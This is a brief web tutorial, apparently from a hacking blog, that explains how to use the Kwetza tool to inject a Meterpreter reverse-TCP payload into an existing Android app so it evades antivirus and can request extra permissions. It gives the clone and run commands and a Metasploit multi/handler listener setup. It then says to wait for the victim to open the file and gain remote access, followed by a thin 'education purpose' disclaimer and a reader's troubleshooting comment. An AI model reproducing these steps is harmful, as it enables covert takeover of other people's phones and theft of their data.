Kwetza | Hack android using Metasploit | Parrot OS

2
2164

Kwetza is a tool that allows you to infect an existing Android application with a Meterpreter payload.

Kwetza infects an existing Android application with either custom or default payload templates to avoid detection by antivirus. Kwetza allows you to infect Android applications using the target application’s default permissions or inject additional permissions to gain additional functionality.

Download Kwetza from Github

git clone https://github.com/sensepost/kwetza.git

To run Kwetza

cd kwetza 
python kwetza.py test.apk tcp 192.168.x.x 4444 yes

After that, Open a new terminal and open metasploit, by using following command

msfconsole
use exploit multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST (i.e. your IP)
set LPORT (i.e. enter that port no. at the time of creating payload)
exploit -j

Wait for the victim will open/execute that file and you will get remote access of the victim device. For better understanding watch the step by step video tutorial given below.

Watch Step By Step Video On Youtube

“This tutorial is strictly for Education purpose, We are not responsible for any kind of damage.”

2 COMMENTS

  1. Hello,

    I am using Parrot Security 4.3 and Kali Linux 2018.4.

    I did all you did on the two distros but but at the end I don’t have “Starting the payload handler…”.

    Can you please help me ?

    Thanks

    WB

LEAVE A REPLY

Please enter your comment!
Please enter your name here